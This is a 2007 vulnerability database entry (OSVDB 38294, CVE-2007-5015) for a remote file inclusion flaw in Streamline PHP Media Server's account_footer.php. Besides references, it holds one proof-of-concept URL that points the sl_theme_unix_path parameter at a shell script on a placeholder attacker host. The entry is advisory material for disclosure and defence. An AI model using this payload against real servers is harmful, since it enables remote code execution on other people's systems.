Streamline PHP Media Server account_footer.php sl_theme_unix_path Variable Remote File Inclusion

2007-09-19T00:00:00
ID OSVDB:38294
Type osvdb
Reporter OSVDB
Modified 2007-09-19T00:00:00

Description

Manual Testing Notes

http://[target]/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=http://[attacker]/shell.txt?

References:

Related OSVDB ID: 38290
Related OSVDB ID: 38293
Related OSVDB ID: 38295
Related OSVDB ID: 38291
Related OSVDB ID: 38292
Other Advisory URL: http://arfis.wordpress.com/2007/09/14/rfi-03-streamline-php-media-server/
ISS X-Force ID: 36683
Generic Exploit URL: http://www.milw0rm.com/exploits/4430
CVE-2007-5015
Bugtraq ID: 25736